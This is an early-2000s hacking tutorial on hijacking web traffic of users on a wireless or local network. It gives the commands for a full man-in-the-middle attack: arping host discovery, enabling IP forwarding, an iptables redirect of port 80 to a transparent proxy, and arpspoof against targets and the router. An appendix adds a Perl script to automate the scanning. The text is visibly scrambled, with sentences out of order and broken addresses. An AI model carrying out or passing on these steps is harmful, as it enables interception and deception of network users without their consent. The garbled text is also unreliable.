Tricking the wireless user. By xxradar. http://www.radarhack.com mailto:xxradar@radarhack.com. Version 1.

0 06-09-2003

This is nothing more than mapping port 80 to port 81.x It’s quite slow.il/ to point out a Linux equivalent. because this may seriously mess up routers and servers. so wireless networks are an easy target. you’ll find a badly written Perl script to automate it in appendix A. First of all.44 is the attacking machine) . root@localhost scripts]# . It will happen transparently and be hard to detect on the targeted machines.168. without using DNS spoofing. With IPtables. First of all turn on forwarding (if not done yet). examine the network. to intercept http connections and display a webpage of choice. I tried to find a relative stealthy and correct way of listing all addresses on the network.10. but here we go. It is quite stealthy and tricks firewalls in revealing their MAC address (and of course their IP addresses). Al research was done on Windows2000 with a tool called ‘Cain & Able’ and a demo version of a commercial firewall. His way of scanning will beat also personal firewalls installed on client machines.nlc.net.au/.168.168.transproxy. Setting up the http interception and routing. You can download it at http://www. put your local IP address running a webserver. root@localhost scripts]# iptables -t nat -A PREROUTING -p tcp --dport 80 -j REDIRECT --to-port 81 On port 81. redirect all incoming packets with a destination port 80 (http) to port 81. Verify that the iptables has an accept policy for the forward chain or appropriate rules./tproxy -s 81 -r nobody 192. there is a transparent proxy running.co.Introduction I took me several days to figure out on how to do it. To succeed in the trick.10. The tool is really intended to intercept http connections and to proxy-chain them to a real proxy servers. as most users on the network.44 80 (192. Thanks to the moderators at http://serureit. At this point all ‘available’ targets are known. This will only work if you're connected to the network to ‘hijack’. We're going to configure our Linux box equipped with an Ethernet or wireless card (more fun). root@localhost scripts]# arping -c1 -w1 192. root@localhost scripts]# echo 1 >/proc/sys/net/ipv4/ip_forward Please note that all non-http traffic must get out. Of course.10. I used a tool called arping to get a list of all active IP address on the segment. especially DNS uninterrupted. try this in a lab environment. hosting a simple webpage instead of the proxy.

168.168.1 (192.10.10. root@localhost scripts]# arpspoof -t 192. and 192.33 192.. Spoof all the targets you obtained in the arping scan. ..10. This can be done via a tool called arpspoof..1 is the router) Before the arpspoof ..168.33 is the attacking machine. use arpspoofing to get all traffic into your attacking machine.10.Intercepting network traffic. After the arpspoof . To intercept the network traffic.168.

but the URL bar is still showing the visited webpage. The browser shows the hijacked page.Conclusion Have fun and be carefull. The only way to prevent this is using ssl or ipsec in the internal lan. or prevent arpspoofing. So it will work most of the time :-) .

txt").Appendix A The badly written perl script to automate ‘arping’.txt It is available at http://www. '-c'.com . $LINE. '1'./ipaddress. '-I'. } close(IN_LST) || die "can't close $!"./ipaddress. '-w'. #!usr/bin/perl open(IN_LST.packetstormsecurity. I used 'imp-range' to generate the list in . while (<IN_LST>) { $LINE = $_. print $RETURN.". 'eth0'. $RETURN = system 'arping'.'1'.